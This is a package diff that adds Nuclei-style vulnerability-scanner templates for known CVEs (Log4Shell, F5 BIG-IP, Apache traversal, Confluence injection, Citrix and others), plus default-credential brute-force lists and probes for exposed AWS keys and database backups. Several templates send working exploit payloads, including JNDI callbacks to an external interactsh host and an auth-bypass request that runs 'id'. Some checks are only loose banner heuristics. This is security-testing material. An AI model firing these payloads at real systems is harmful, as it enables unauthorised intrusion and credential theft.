moriarty-project 0.1.6__py3-none-any.whl

moriarty/assets/templates/cves/CVE-2021-42013.yaml

@@ -0,0 +1,28 @@
+id: cve-2021-42013
+
+info:
+  name: Apache HTTP Server RCE (CVE-2021-42013)
+  author: moriarty
+  severity: critical
+  description: Detects Apache HTTP Server 2.4.50 traversal leading to code execution
+  tags: cve,apache,rce
+
+requests:
+  - method: GET
+    path:
+      - "/cgi-bin/.%%32%%65/.%%32%%65/.%%32%%65/.%%32%%65/bin/sh"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 500
+      - type: word
+        words:
+          - "Content-type:"
+          - "GNU Bash"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'Internal Server Error') or contains(body, 'bin/sh')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2021-44228.yaml

@@ -0,0 +1,27 @@
+id: CVE-2021-44228
+
+info:
+  name: Apache Log4j RCE (Log4Shell)
+  author: moriarty
+  severity: critical
+  description: Apache Log4j2 Remote Code Execution (CVE-2021-44228)
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  tags: cve,cve2021,rce,log4j
+
+requests:
+  - method: GET
+    path:
+      - "/"
+
+    headers:
+      X-Api-Version: "${jndi:ldap://{{interactsh-url}}/a}"
+      User-Agent: "${jndi:ldap://{{interactsh-url}}/a}"
+      Referer: "${jndi:ldap://{{interactsh-url}}/a}"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"

moriarty/assets/templates/cves/CVE-2022-0185.yaml

@@ -0,0 +1,21 @@
+id: CVE-2022-0185
+
+info:
+  name: Linux Kernel Heap Buffer Overflow
+  author: moriarty
+  severity: critical
+  description: Linux Kernel Heap-Based Buffer Overflow in legacy_parse_param
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0185
+  tags: cve,cve2022,kernel,linux
+
+requests:
+  - method: GET
+    path:
+      - "/proc/version"
+      - "/proc/sys/kernel/osrelease"
+
+    matchers:
+      - type: regex
+        regex:
+          - "Linux version ([0-5]\\.[0-9]+\\.[0-9]+)"

moriarty/assets/templates/cves/CVE-2022-1388.yaml

@@ -0,0 +1,36 @@
+id: cve-2022-1388
+
+info:
+  name: F5 BIG-IP iControl REST Auth Bypass (CVE-2022-1388)
+  author: moriarty
+  severity: critical
+  description: Detects F5 BIG-IP appliances vulnerable to iControl REST authentication bypass
+  tags: cve,f5,auth-bypass
+
+requests:
+  - raw:
+      - |
+          POST /mgmt/tm/util/bash HTTP/1.1
+          Host: {{Hostname}}
+          Connection: keep-alive, x-F5-auth-token
+          x-F5-auth-token: a
+          Authorization: Basic Zm9vOmJhcg==
+          Content-Type: application/json
+          Content-Length: 37
+
+          {"command":"run","utilCmdArgs":"-c id"}
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 401
+      - type: word
+        words:
+          - "commandResult"
+          - "utilCmdArgs"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'uid=')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2022-22954.yaml

@@ -0,0 +1,28 @@
+id: cve-2022-22954
+
+info:
+  name: VMware Workspace ONE Access SSRF (CVE-2022-22954)
+  author: moriarty
+  severity: critical
+  description: Detects Workspace ONE Access vulnerable template rendering endpoint
+  tags: cve,vmware,ssrf
+
+requests:
+  - method: GET
+    path:
+      - "/catalog-portal/ui/uI/GetCatalogUpgradeHistory?hostID={{Hostname}}"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+          - 200
+      - type: regex
+        regex:
+          - "org.springframework"
+          - "Template processing error"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'CatalogUpgradeHistory')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2022-22965.yaml

@@ -0,0 +1,31 @@
+id: cve-2022-22965
+
+info:
+  name: Spring4Shell RCE Indicator (CVE-2022-22965)
+  author: moriarty
+  severity: critical
+  description: Detects Spring Core applications responding with class loader exposure markers
+  tags: cve,spring,rce
+
+requests:
+  - method: GET
+    path:
+      - "/?class.module.classLoader=1"
+      - "/app?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7B%7D"
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body, 'class.module.classLoader')"
+          - "contains(body, 'org.springframework')"
+        condition: or
+      - type: regex
+        regex:
+          - "TomcatEmbeddedContext"
+          - "org.apache.catalina.core.StandardContext"
+        condition: or
+      - type: status
+        status:
+          - 200
+          - 500
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2022-26134.yaml

@@ -0,0 +1,27 @@
+id: cve-2022-26134
+
+info:
+  name: Confluence OGNL Injection (CVE-2022-26134)
+  author: moriarty
+  severity: critical
+  description: Detects Confluence 0-day OGNL injection via search parameter evaluation
+  tags: cve,confluence,rce
+
+requests:
+  - method: GET
+    path:
+      - "/?search=%24%7B111*111%7D"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 302
+      - type: word
+        words:
+          - "12321"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'Confluence') or contains(header('Location') or '', '12321')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2023-22515.yaml

@@ -0,0 +1,27 @@
+id: cve-2023-22515
+
+info:
+  name: Confluence Critical Auth Bypass (CVE-2023-22515)
+  author: moriarty
+  severity: critical
+  description: Detects Atlassian Confluence setup reconfiguration exposure
+  tags: cve,confluence,auth-bypass
+
+requests:
+  - method: GET
+    path:
+      - "/setup/setupadministrator.action"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Atlassian Confluence"
+          - "administrator account"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'bootstrap.setup.step')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2023-22527.yaml

@@ -0,0 +1,29 @@
+id: cve-2023-22527
+
+info:
+  name: Confluence Template Injection (CVE-2023-22527)
+  author: moriarty
+  severity: critical
+  description: Detects Confluence REST endpoint exposing velocity template evaluation
+  tags: cve,confluence,template
+
+requests:
+  - method: POST
+    path:
+      - "/pages/doenterpagevariables.action"
+    headers:
+      Content-Type: "application/x-www-form-urlencoded"
+    body: "queryString=$%7B123*321%7D&atl_token="
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "39583"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'Confluence')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2023-23752.yaml

@@ -0,0 +1,33 @@
+id: CVE-2023-23752
+
+info:
+  name: Joomla Unauthorized Access
+  author: moriarty
+  severity: high
+  description: Joomla! < 4.2.8 - Unauthenticated Information Disclosure
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
+  tags: cve,cve2023,joomla
+
+requests:
+  - method: GET
+    path:
+      - "/api/index.php/v1/config/application?public=true"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"dbtype"'
+          - '"host"'
+          - '"user"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        json:
+          - '.data.attributes.db'

moriarty/assets/templates/cves/CVE-2023-27350.yaml

@@ -0,0 +1,27 @@
+id: cve-2023-27350
+
+info:
+  name: PaperCut NG Authentication Bypass (CVE-2023-27350)
+  author: moriarty
+  severity: high
+  description: Detects PaperCut NG/ MF exposure via setup completion page
+  tags: cve,papercut,auth-bypass
+
+requests:
+  - method: GET
+    path:
+      - "/app?service=page/SetupCompleted"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "PaperCut"
+          - "Setup Completed"
+        condition: and
+      - type: dsl
+        dsl:
+          - "contains(body, 'server.showDiagnosticInfo')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2023-2868.yaml

@@ -0,0 +1,27 @@
+id: cve-2023-2868
+
+info:
+  name: Barracuda ESG Remote Command Injection (CVE-2023-2868)
+  author: moriarty
+  severity: critical
+  description: Detects Barracuda ESG vulnerable ccgi endpoint exposure
+  tags: cve,barracuda,rce
+
+requests:
+  - method: GET
+    path:
+      - "/cgi-mod/index.cgi"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Barracuda"
+          - "Email Security"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'login_page.stm')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2023-34362.yaml

@@ -0,0 +1,27 @@
+id: cve-2023-34362
+
+info:
+  name: MOVEit Transfer SQLi (CVE-2023-34362)
+  author: moriarty
+  severity: critical
+  description: Detects MOVEit Transfer portals exposing vulnerable human.aspx endpoint
+  tags: cve,moveit,sqli
+
+requests:
+  - method: GET
+    path:
+      - "/human.aspx"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Progress MOVEit"
+          - "moveit-transfer"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'Login to MOVEit')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2023-3519.yaml

@@ -0,0 +1,28 @@
+id: cve-2023-3519
+
+info:
+  name: Citrix ADC Auth Bypass (CVE-2023-3519)
+  author: moriarty
+  severity: critical
+  description: Detects Citrix ADC vulnerable login gateway endpoint
+  tags: cve,citrix,auth-bypass
+
+requests:
+  - method: GET
+    path:
+      - "/cgi/login.cgi"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 302
+      - type: word
+        words:
+          - "Citrix ADC"
+          - "nsvpn"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(header('Set-Cookie') or '', 'NSC_')"
+    stop-at-first-match: true

moriarty/assets/templates/cves/CVE-2023-4966.yaml

@@ -0,0 +1,27 @@
+id: cve-2023-4966
+
+info:
+  name: Citrix Bleed Session Leak (CVE-2023-4966)
+  author: moriarty
+  severity: critical
+  description: Detects Citrix ADC gateway leaking memory on OAuth OIDC endpoint
+  tags: cve,citrix,info-leak
+
+requests:
+  - method: GET
+    path:
+      - "/oauth/idp/.well-known/openid-configuration"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "issuer"
+          - "citrix"
+        condition: or
+      - type: dsl
+        dsl:
+          - "contains(body, 'NSC_') or contains(body, 'Citrix Gateway')"
+    stop-at-first-match: true

moriarty/assets/templates/default-logins/admin-weak.yaml

@@ -0,0 +1,40 @@
+id: admin-weak-password
+
+info:
+  name: Admin Panel Weak Credentials
+  author: moriarty
+  severity: critical
+  description: Tests common admin credentials
+  tags: default-login,bruteforce
+
+requests:
+  - method: POST
+    path:
+      - "/admin/login"
+      - "/administrator/login"
+      - "/admin.php"
+      - "/login.php"
+
+    body: "username={{user}}&password={{pass}}"
+
+    payloads:
+      user:
+        - admin
+        - administrator
+        - root
+        - admin123
+      pass:
+        - admin
+        - password
+        - 12345
+        - admin123
+        - root
+        - Password1
+
+    matchers:
+      - type: word
+        words:
+          - "dashboard"
+          - "logout"
+          - "welcome"
+        condition: or

moriarty/assets/templates/default-logins/wordpress-default.yaml

@@ -0,0 +1,38 @@
+id: wordpress-default-login
+
+info:
+  name: WordPress Default Credentials
+  author: moriarty
+  severity: critical
+  description: Tests for WordPress default/weak credentials
+  tags: wordpress,default-login
+
+requests:
+  - method: POST
+    path:
+      - "/wp-login.php"
+
+    body: "log={{username}}&pwd={{password}}&wp-submit=Log+In"
+
+    payloads:
+      username:
+        - admin
+        - administrator
+        - root
+        - test
+      password:
+        - admin
+        - password
+        - 123456
+        - admin123
+
+    matchers:
+      - type: word
+        words:
+          - "Dashboard"
+          - "wp-admin"
+        condition: or
+
+      - type: status
+        status:
+          - 302

moriarty/assets/templates/exposures/aws-credentials.yaml

@@ -0,0 +1,35 @@
+id: aws-credentials
+
+info:
+  name: AWS Credentials Exposure
+  author: moriarty
+  severity: critical
+  description: Detects exposed AWS credentials
+  tags: aws,cloud,credentials
+
+requests:
+  - method: GET
+    path:
+      - "/.aws/credentials"
+      - "/credentials"
+      - "/aws.json"
+      - "/config/aws.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "aws_access_key_id"
+          - "aws_secret_access_key"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: access_key
+        regex:
+          - 'aws_access_key_id\s*=\s*([A-Z0-9]+)'
+          - 'AKIA[0-9A-Z]{16}'

moriarty/assets/templates/exposures/backup-files.yaml

@@ -0,0 +1,36 @@
+id: backup-files
+
+info:
+  name: Backup Files Exposure
+  author: moriarty
+  severity: high
+  description: Detects exposed backup files that may contain sensitive data
+  tags: backup,exposure,files
+
+requests:
+  - method: GET
+    path:
+      - "/backup.sql"
+      - "/backup.zip"
+      - "/backup.tar.gz"
+      - "/db.sql"
+      - "/database.sql"
+      - "/dump.sql"
+      - "/backup.bak"
+      - "/backup.old"
+      - "/site.tar.gz"
+      - "/www.zip"
+      - "/backup{{BaseURL}}.zip"
+
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "application/zip"
+          - "application/x-tar"
+          - "application/sql"
+        part: header
+        condition: or

moriarty/assets/templates/exposures/database-files.yaml

@@ -0,0 +1,34 @@
+id: database-files
+
+info:
+  name: Database Files Exposure
+  author: moriarty
+  severity: critical
+  description: Detects exposed database files
+  tags: database,exposure
+
+requests:
+  - method: GET
+    path:
+      - "/database.sql"
+      - "/db.sql"
+      - "/dump.sql"
+      - "/backup.sql"
+      - "/mysql.sql"
+      - "/database.db"
+      - "/db.sqlite"
+      - "/db.sqlite3"
+      - "/data.db"
+
+    matchers:
+      - type: word
+        words:
+          - "INSERT INTO"
+          - "CREATE TABLE"
+          - "DROP TABLE"
+          - "SQLite format"
+        condition: or
+
+      - type: status
+        status:
+          - 200

moriarty/assets/templates/exposures/docker-exposed.yaml

@@ -0,0 +1,31 @@
+id: docker-exposed
+
+info:
+  name: Docker Files Exposure
+  author: moriarty
+  severity: medium
+  description: Detects exposed Docker configuration files
+  tags: docker,exposure
+
+requests:
+  - method: GET
+    path:
+      - "/Dockerfile"
+      - "/.dockerignore"
+      - "/docker-compose.yml"
+      - "/docker-compose.yaml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "FROM "
+          - "RUN "
+          - "COPY "
+          - "version:"
+          - "services:"
+        condition: or
+
+      - type: status
+        status:
+          - 200